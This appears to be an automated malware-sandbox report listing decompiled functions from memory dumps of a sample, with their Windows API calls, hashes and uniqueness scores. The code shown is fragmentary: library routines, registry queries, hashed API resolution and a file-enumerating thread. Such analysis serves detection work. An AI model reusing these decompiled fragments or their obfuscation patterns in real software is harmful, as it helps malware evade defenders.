Instruction ID: 8b54ca67ecb1dfb76dd9cff8a8dae7aeac7f4030b5c66303740f685fa1df9526
Opcode Fuzzy Hash: 371c9f3517e04325da3ef73c8bd6ee5ea8e6658fe9aeec0455d0ac67d9139bcd
Instruction Fuzzy Hash: 58512271F042648EDB20CF66E4806ABBBF5EF91304FA4406FD48687291D67C9942CB9A

Uniqueness

Uniqueness Score: 0.06%

Function 0042D25A, Relevance: 3.2, APIs: 2, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 0042CDF3: GetOEMCP.KERNEL32(00000000,0042D069,?,?,?), ref: 0042CE1E
Part of subcall function 0042CDF3: GetACP.KERNEL32(00000000,0042D069,?,?,?), ref: 0042CE35

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0042D0B0,?,00000000,?,?,?), ref: 0042D2B8

Part of subcall function 0042CECB: GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 0042CEFD

GetCPInfo.KERNEL32(00000000,0042D0B0,?,?,0042D0B0,?,00000000,?,?,?), ref: 0042D2FA

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: Info$CodePageValid
String ID:
API String ID: 3244775715-0
Opcode ID: 0e84856405ae01a6bcd31c27825fcacb1c25c12227af8dea60d59d3cd1cfc2f8
Instruction ID: 8b54ca67ecb1dfb76dd9cff8a8dae7aeac7f4030b5c66303740f685fa1df9526
Opcode Fuzzy Hash: 0e84856405ae01a6bcd31c27825fcacb1c25c12227af8dea60d59d3cd1cfc2f8
Instruction Fuzzy Hash: 58512271F042648EDB20CF66E4806ABBBF5EF91304FA4406FD48687291D67C9942CB9A

Uniqueness

Uniqueness Score: 0.06%

Function 0042D04E, Relevance: 3.1, APIs: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0042D04E(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t39;
				signed int _t44;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;
				void* _t95;

				_push(_a16);
				_push(_a12);
				E0042D169(__ebx, __ecx, __edx, __eflags, _t95);
				_t39 = E0042CDF3(__eflags, _a4);
				_v16 = _t39;
				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t81 = E0042151C(0x220);
				_t64 = __ebx | 0xffffffff;
				__eflags = _t81;
				if(__eflags == 0) {
					L5:
					_t86 = _t64;
					goto L6;
				} else {
					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
					 *_t81 =  *_t81 & 0x00000000; // executed
					_t44 = E0042D25A(__eflags, _v16, _t81); // executed
					_t86 = _t44;
					__eflags = _t86 - _t64;
					if(__eflags != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00423DB6();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t64 == 1;
						if(_t64 == 1) {
							_t58 = _a12;
							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x44b9d8;
							if( *((intOrPtr*)(_t58 + 0x48)) != 0x44b9d8) {
								E004214E2( *((intOrPtr*)(_t58 + 0x48)));
							}
						}
						 *_t81 = 1;
						_t76 = _t81;
						_t81 = 0;
						 *(_a12 + 0x48) = _t76;
						_t48 = _a12;
						__eflags =  *(_t48 + 0x350) & 0x00000002;
						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x44b940 & 0x00000001;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t51 = 5;
								_v16 = _t51;
								_v12 = _t51;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E0042CCEF(__eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x44b8fc =  *_a16;
								}
							}
						}
						L6:
						E004214E2(_t81);
						return _t86;
					} else {
						 *((intOrPtr*)(E0041A8EF(__eflags))) = 0x16;
						goto L5;
					}
				}
			}

0x0042d056
0x0042d059
0x0042d05c
0x0042d064
0x0042d06f
0x0042d078
0x00000000
0x0042d07a
0x0042d07e
0x0042d08b
0x0042d08d
0x0042d091
0x0042d093
0x0042d0c3
0x0042d0c3
0x00000000
0x0042d095
0x0042d0a2
0x0042d0a8
0x0042d0ab
0x0042d0b0
0x0042d0b4
0x0042d0b6
0x0042d0d5
0x0042d0d9
0x0042d0db
0x0042d0db
0x0042d0e6
0x0042d0ea
0x0042d0eb
0x0042d0ed
0x0042d0f0
0x0042d0f7
0x0042d0fc
0x0042d101
0x0042d0f7
0x0042d102
0x0042d108
0x0042d10d
0x0042d10f
0x0042d112
0x0042d115
0x0042d11c
0x0042d11e
0x0042d125
0x0042d12a
0x0042d135
0x0042d138
0x0042d139
0x0042d13c
0x0042d142
0x0042d146
0x0042d14a
0x0042d14b
0x0042d150
0x0042d154
0x0042d15f
0x0042d15f
0x0042d154
0x0042d125
0x0042d0c5
0x0042d0c6
0x00000000
0x0042d0b8
0x0042d0bd
0x00000000
0x0042d0bd
0x0042d0b6

APIs

Part of subcall function 0042D169: _free.LIBCMT ref: 0042D1C6

Part of subcall function 0042CDF3: GetOEMCP.KERNEL32(00000000,0042D069,0042695B,00000000,0041C230,0041C230,00000000,?,0042695B), ref: 0042CE1E
Part of subcall function 0042CDF3: GetACP.KERNEL32(00000000,0042D069,0042695B,00000000,0041C230,0041C230,00000000,?,0042695B), ref: 0042CE35

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,0041370C,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 0042154E

_free.LIBCMT ref: 0042D0C6

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

Part of subcall function 0042D25A: IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0042D0B0,?,00000000,0042695B,558B0000,?,?,?,?,0041C230), ref: 0042D2B8
Part of subcall function 0042D25A: GetCPInfo.KERNEL32(00000000,0042D0B0,?,?,0042D0B0,?,00000000,0042695B,558B0000,?,?,?,?,0041C230,00000000), ref: 0042D2FA

_free.LIBCMT ref: 0042D0FC

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$Heap$AllocateCodeErrorFreeInfoLastPageValid
String ID:
API String ID: 2276534252-0
Opcode ID: 9b85f75dce4d870a36d97393b6cea42cc67466925ecbb075abb8fd064ae0256a
Instruction ID: a38b290dfbf0565ebc2d8fc946a7673296bbe18e91c4e20e6beb48178977174f
Opcode Fuzzy Hash: 9b85f75dce4d870a36d97393b6cea42cc67466925ecbb075abb8fd064ae0256a
Instruction Fuzzy Hash: 7931E371E00219AFCB10EF69E880BAF77A5FF44318F50406BF91497261EB3A9D51CB98

Uniqueness

Uniqueness Score: 0.14%

Function 0042D04E, Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0042D169: _free.LIBCMT ref: 0042D1C6

Part of subcall function 0042CDF3: GetOEMCP.KERNEL32(00000000,0042D069,?,?,?), ref: 0042CE1E
Part of subcall function 0042CDF3: GetACP.KERNEL32(00000000,0042D069,?,?,?), ref: 0042CE35

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0042154E

_free.LIBCMT ref: 0042D0C6

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

Part of subcall function 0042D25A: IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0042D0B0,?,00000000,?,?,?), ref: 0042D2B8
Part of subcall function 0042D25A: GetCPInfo.KERNEL32(00000000,0042D0B0,?,?,0042D0B0,?,00000000,?,?,?), ref: 0042D2FA

_free.LIBCMT ref: 0042D0FC

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$Heap$AllocateCodeErrorFreeInfoLastPageValid
String ID:
API String ID: 2276534252-0
Opcode ID: 9cc6dd1dfde2a4cd255bba22165272b515dad967b0d5d95b0201b4394eccabde
Instruction ID: a38b290dfbf0565ebc2d8fc946a7673296bbe18e91c4e20e6beb48178977174f
Opcode Fuzzy Hash: 9cc6dd1dfde2a4cd255bba22165272b515dad967b0d5d95b0201b4394eccabde
Instruction Fuzzy Hash: 7931E371E00219AFCB10EF69E880BAF77A5FF44318F50406BF91497261EB3A9D51CB98

Uniqueness

Uniqueness Score: 0.14%

Function 00425B20, Relevance: 3.1, APIs: 2, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00425B20(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x44dee8 + _a4 * 4;
				_t28 =  *0x44b6b4; // 0x4a5cc10f
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E00425A57(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x44b6b4;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E00419EA6(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x00425b2a
0x00425b34
0x00425b3a
0x00425b3f
0x00425b41
0x00425b44
0x00425b48
0x00425b50
0x00425b5d
0x00425b66
0x00425b85
0x00425b8a
0x00425b92
0x00425b9a
0x00425b9c
0x00425b9e
0x00000000
0x00425b9e
0x00425b72
0x00425b76
0x00000000
0x00000000
0x00425b7f
0x00425b81
0x00000000
0x00425b81
0x00000000
0x00425b52
0x00000000

APIs

Part of subcall function 00425A57: LoadLibraryExW.KERNELBASE(?,00000000,00000800,0041370C,00000000,?,4A5CC10F,?,00425B62,?,?,00000000,0041370C,?,?,00425DB1), ref: 00425A95
Part of subcall function 00425A57: GetLastError.KERNEL32(?,00425B62,?,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000,?,00425341), ref: 00425AA1
Part of subcall function 00425A57: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?,?,0041370C), ref: 00425AD7
Part of subcall function 00425A57: FreeLibrary.KERNEL32(00000000,?,00425B62,?,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000), ref: 00425AFD

GetProcAddress.KERNEL32(00000000,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000,?,00425341,00000005,000000FF), ref: 00425B6C
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00425B79

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Library$Load$AddressErrorFreeLastProc__crt_fast_encode_pointer
String ID:
API String ID: 3984727298-0
Opcode ID: 49dacbcd84175248c29211437e496a9638ee74001e0d61eca5920ac1688c83a7
Instruction ID: f844dbc10a74f0d1f5cfc81290be0b1d2a221c7f9fa551499e1ad43842108d82
Opcode Fuzzy Hash: 49dacbcd84175248c29211437e496a9638ee74001e0d61eca5920ac1688c83a7
Instruction Fuzzy Hash: 7A01D237704A315FAB268F2DFC4495B37A6EBC13707654122FA04CB294EB34E8018B89

Uniqueness

Uniqueness Score: 0.51%

Function 00404BC2, Relevance: 3.0, APIs: 2, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BC2(void* __ebx, void* __ecx, void* __esi, void* __eflags, void* _a4, short* _a8, short* _a12, char* _a16, int _a20, void* _a24) {
				int _v8;
				long _t12;
				int* _t13;
				long _t16;
				int* _t28;

				E004010BB(__ebx, 5, 0xaad67fee);
				_t28 = 0;
				_t12 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_a24); // executed
				if(_t12 != 0) {
					_t13 = 0;
				} else {
					_v8 = _a20;
					E004010BB(__ebx, 5, 0x1802e7de);
					_t16 = RegQueryValueExW(_a24, _a12, 0, 0, _a16,  &_v8); // executed
					if(_t16 == 0) {
						_t28 = 1;
					}
					E00401AFB(_a24);
					_t13 = _t28;
				}
				return _t13;
			}

0x00404bce
0x00404bd8
0x00404be7
0x00404beb
0x00404c27
0x00404bed
0x00404bfb
0x00404bfe
0x00404c12
0x00404c17
0x00404c19
0x00404c19
0x00404c1d
0x00404c23
0x00404c23
0x00404c2d

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?), ref: 00404BE7
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?), ref: 00404C12

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoadOpenQueryValue
String ID:
API String ID: 345902999-0
Opcode ID: e5632a5c73402d9465b2f8e31e48bf8dbfa4758df7e53824da711f1300b84b76
Instruction ID: ce57fb9806533adefdd400a8e8980edaa4f85cebe91107b06d52bd35b365fc9a
Opcode Fuzzy Hash: e5632a5c73402d9465b2f8e31e48bf8dbfa4758df7e53824da711f1300b84b76
Instruction Fuzzy Hash: AB01F432209249BBEF159F96EC06DDF3B79DFC4710F10002EFA10A6590EAB599229B64

Uniqueness

Uniqueness Score: 0.03%

Function 0040BACB, Relevance: 3.0, APIs: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BACB(void* __ebx, void* __esi, void* __eflags, void* _a4, int _a8, short* _a12, char* _a16, short* _a20, void* _a24) {
				long _t12;
				long _t16;
				int* _t27;

				E004010BB(__ebx, 5, 0xaad67fee);
				_t27 = 0;
				_t12 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_a24); // executed
				if(_t12 != 0) {
					return 0;
				}
				_a8 = _a20;
				E004010BB(__ebx, 5, 0x1802e7de);
				_t16 = RegQueryValueExW(_a24, _a12, 0, 0, _a16,  &_a8); // executed
				if(_t16 == 0) {
					_t27 = 1;
				}
				E00401AFB(_a24);
				return _t27;
			}

0x0040bad6
0x0040bae0
0x0040baef
0x0040baf3
0x00000000
0x0040bb2f
0x0040bb03
0x0040bb06
0x0040bb1a
0x0040bb1f
0x0040bb21
0x0040bb21
0x0040bb25
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

RegOpenKeyExW.KERNEL32(00000080,?,00000000,00020019,0040B486,7757BFA8,?,0040B486,80000002,?,00000000,?,00000080,00000000), ref: 0040BAEF
RegQueryValueExW.KERNEL32(0040B486,00000000,00000000,00000000,?,?,00000000,?,0040B486,80000002,?,00000000,?,00000080,00000000), ref: 0040BB1A

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoadOpenQueryValue
String ID:
API String ID: 345902999-0
Opcode ID: 8b3a875d01548fbf88fd8606f35653192a6027a1d2fd9bd8b3cf8cd789b84ca2
Instruction ID: a3e072792aa4ccfa33f41ae2116e3e61fd8e50ca3bb9b01d4cd60c90a3adabed
Opcode Fuzzy Hash: 8b3a875d01548fbf88fd8606f35653192a6027a1d2fd9bd8b3cf8cd789b84ca2
Instruction Fuzzy Hash: 3DF0F4321042497BDB11AF96EC06DDB3B7ADFC4710F10402EF91095490EB75E912DBA8

Uniqueness

Uniqueness Score: 0.03%

Function 00404340, Relevance: 3.0, APIs: 2, Instructions: 44
UNIQUE

Download Yara Rule

C-Code - Quality: 96%

			E00404340(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr* _t37;

				_t37 = __ecx;
				 *__ecx = 0x43789c;
				_t36 = E0041500C(_t35, __eflags, 8);
				if(_t36 == 0) {
					_t36 = 0;
					__eflags = 0;
				} else {
					_push(1); // executed
					_t32 = E00413DB8(); // executed
					 *((intOrPtr*)(_t36 + 4)) = _t32;
				}
				_t2 = _t37 + 4; // 0x44d4bc
				 *((intOrPtr*)(_t37 + 0x34)) = _t36;
				 *((intOrPtr*)(_t37 + 0xc)) = _t2;
				_t5 = _t37 + 8; // 0x44d4c0
				_t34 = _t5;
				_t6 = _t37 + 0x14; // 0x44d4cc
				 *((intOrPtr*)(_t37 + 0x10)) = _t34;
				 *((intOrPtr*)(_t37 + 0x1c)) = _t6;
				_t9 = _t37 + 0x18; // 0x44d4d0
				 *((intOrPtr*)(_t37 + 0x20)) = _t9;
				_t11 = _t37 + 0x24; // 0x44d4dc
				 *((intOrPtr*)(_t37 + 0x2c)) = _t11;
				_t13 = _t37 + 0x28; // 0x44d4e0
				 *((intOrPtr*)(_t37 + 0x30)) = _t13;
				 *_t34 = 0;
				_t15 = _t37 + 0x20; // 0x44b710
				 *((intOrPtr*)( *_t15)) = 0;
				_t16 = _t37 + 0x30; // 0x44b718
				 *((intOrPtr*)( *_t16)) = 0;
				_t17 = _t37 + 0xc; // 0x44b714
				 *((intOrPtr*)( *_t17)) = 0;
				_t18 = _t37 + 0x1c; // 0x44b710
				 *((intOrPtr*)( *_t18)) = 0;
				_t19 = _t37 + 0x2c; // 0x44b718
				 *((intOrPtr*)( *_t19)) = 0;
				return _t37;
			}

0x00404341
0x00404346
0x00404351
0x00404358
0x00404369
0x00404369
0x0040435a
0x0040435a
0x0040435c
0x00404364
0x00404364
0x0040436b
0x0040436e
0x00404371
0x00404374
0x00404374
0x00404377
0x0040437a
0x0040437d
0x00404380
0x00404383
0x00404386
0x00404389
0x0040438c
0x0040438f
0x00404392
0x00404398
0x0040439c
0x004043a2
0x004043a5
0x004043ab
0x004043ae
0x004043b4
0x004043b7
0x004043bd
0x004043c0
0x004043c9

APIs

new.LIBCMT ref: 0040434C

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

std::locale::_Init.LIBCPMT ref: 0040435C

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::locale::_$Lockitstd::_$Concurrency::cancel_current_taskInitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
String ID:
API String ID: 4010914011-0
Opcode ID: 10527ce3ef79af0ec3ebdfe861e1d00d4fc6c8cb2e2e08d997c47307a4b2d6ee
Instruction ID: 59e6d3a1cb018b2481ef2bf698fdb37a0a55461f94c7660127e81e751e316461
Opcode Fuzzy Hash: 10527ce3ef79af0ec3ebdfe861e1d00d4fc6c8cb2e2e08d997c47307a4b2d6ee
Instruction Fuzzy Hash: C7118DB5500B018FD3618F25D540B83BBF4BF89710F018A6ED88A8BB50E7B5F9498F94

Uniqueness

Uniqueness Score: 100.00%

Function 0040C5DE, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0040C5DE(char _a4) {
				signed short* _t8;
				signed short* _t20;
				signed short* _t22;
				signed short _t24;

				_t1 =  &_a4; // 0x40453a
				_t8 = E0040C6BA(2 + lstrlenW( *_t1) * 2); // executed
				_t22 = _t8;
				if(_t22 != 0) {
					E00401AAD(_t22, _a4);
					_t20 = _t22;
					_t24 =  *_t22;
					while(_t24 != 0) {
						 *_t20 = E0040C630( *_t20 & 0x0000ffff);
						_t20 =  &(_t20[1]);
					}
					return _t22;
				}
				return _t8;
			}

0x0040c5e2
0x0040c5f3
0x0040c5f8
0x0040c5fd
0x0040c605
0x0040c60c
0x0040c60e
0x0040c626
0x0040c61d
0x0040c620
0x0040c623
0x00000000
0x0040c62c
0x0040c62f

APIs

lstrlenW.KERNEL32(:E@,00000000,?,0040453A,00000000), ref: 0040C5E5

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Strings

:E@, xrefs: 0040C5E2

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocVirtuallstrlen
String ID: :E@
API String ID: 1247115370-762266500
Opcode ID: 0761a8222678b67c565b61b98f0d1ed9ab5a0e831380577135462f2fa0611ef3
Instruction ID: 45435375178d3b78c50c0e002f522d07e9eb70264cd9fd6fd0c87263d7b39db3
Opcode Fuzzy Hash: 0761a8222678b67c565b61b98f0d1ed9ab5a0e831380577135462f2fa0611ef3
Instruction Fuzzy Hash: E1F0A732501526E6CB212BE6EC8489BF76CEF847657105637F404A71A0EB3A98D2C7D8

Uniqueness

Uniqueness Score: 100.00%

Function 00422B2F, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422B2F(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x00422b34

APIs

Part of subcall function 0042D49F: GetEnvironmentStringsW.KERNEL32 ref: 0042D4A8
Part of subcall function 0042D49F: _free.LIBCMT ref: 0042D507
Part of subcall function 0042D49F: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042D516

Part of subcall function 00422B81: _free.LIBCMT ref: 00422C11
Part of subcall function 00422B81: _free.LIBCMT ref: 00422C2C
Part of subcall function 00422B81: _free.LIBCMT ref: 00422C37

_free.LIBCMT ref: 00422B6F

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 00422B76

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$EnvironmentFreeStrings$ErrorHeapLast
String ID:
API String ID: 226589364-0
Opcode ID: 71c453f405fcae436731ae9988dcc48e3c6640cb4e0aaf9ad1d4442b33394787
Instruction ID: c742dc77c1df8b887ee30b8834bb2dea5f675e443cecb9c8faad873cd96370ac
Opcode Fuzzy Hash: 71c453f405fcae436731ae9988dcc48e3c6640cb4e0aaf9ad1d4442b33394787
Instruction Fuzzy Hash: 0CE06527F0593126E2217F7B7D52B6A1B414BA1779FA1432BFC248A1E2DAEC9803415E

Uniqueness

Uniqueness Score: 0.14%

Function 00422B2F, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0042D49F: GetEnvironmentStringsW.KERNEL32 ref: 0042D4A8
Part of subcall function 0042D49F: _free.LIBCMT ref: 0042D507
Part of subcall function 0042D49F: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042D516

Part of subcall function 00422B81: _free.LIBCMT ref: 00422C11
Part of subcall function 00422B81: _free.LIBCMT ref: 00422C2C
Part of subcall function 00422B81: _free.LIBCMT ref: 00422C37

_free.LIBCMT ref: 00422B6F

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 00422B76

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$EnvironmentFreeStrings$ErrorHeapLast
String ID:
API String ID: 226589364-0
Opcode ID: 5664fdba278a8030a82ebb3600aab9cdc8f65ba21e4c9358d1d133c7751e565c
Instruction ID: c742dc77c1df8b887ee30b8834bb2dea5f675e443cecb9c8faad873cd96370ac
Opcode Fuzzy Hash: 5664fdba278a8030a82ebb3600aab9cdc8f65ba21e4c9358d1d133c7751e565c
Instruction Fuzzy Hash: 0CE06527F0593126E2217F7B7D52B6A1B414BA1779FA1432BFC248A1E2DAEC9803415E

Uniqueness

Uniqueness Score: 0.14%

Function 0040203B, Relevance: 3.0, APIs: 2, Instructions: 25
threadUNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E0040203B(intOrPtr _a4) {
				WCHAR* _t3;
				void* _t7;
				void* _t9;
				WCHAR* _t10;
				intOrPtr _t11;

				_t3 = E0040C6BA(0x2000); // executed
				_t11 = _a4;
				_t10 = _t3;
				_pop(_t7);
				if(_t10 != 0) {
					wsprintfW(_t10, 0x411130, _t11);
					E00408A8F(_t7, _t9, _t10,  *((intOrPtr*)(_t11 + 4)), 0); // executed
				}
				E0040C6D1(_t11);
				ExitThread(0);
			}

0x00402045
0x0040204a
0x0040204d
0x0040204f
0x00402052
0x0040205b
0x00402067
0x0040206c
0x00402070
0x00402078

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

wsprintfW.USER32 ref: 0040205B

Part of subcall function 00408A8F: lstrlenW.KERNEL32(?,00000000,00000000,00000000), ref: 00408AFC
Part of subcall function 00408A8F: FindFirstFileExW.KERNELBASE(?,00000001,?,00000000,00000000,00000002), ref: 00408B39
Part of subcall function 00408A8F: FindFirstFileW.KERNELBASE(?,?), ref: 00408B58
Part of subcall function 00408A8F: FindNextFileW.KERNELBASE(00000000,?), ref: 00408CAA
Part of subcall function 00408A8F: CloseHandle.KERNEL32(00000000), ref: 00408CBE

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

ExitThread.KERNEL32 ref: 00402078

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FileFind$FirstVirtual$AllocCloseExitFreeHandleNextThreadlstrlenwsprintf
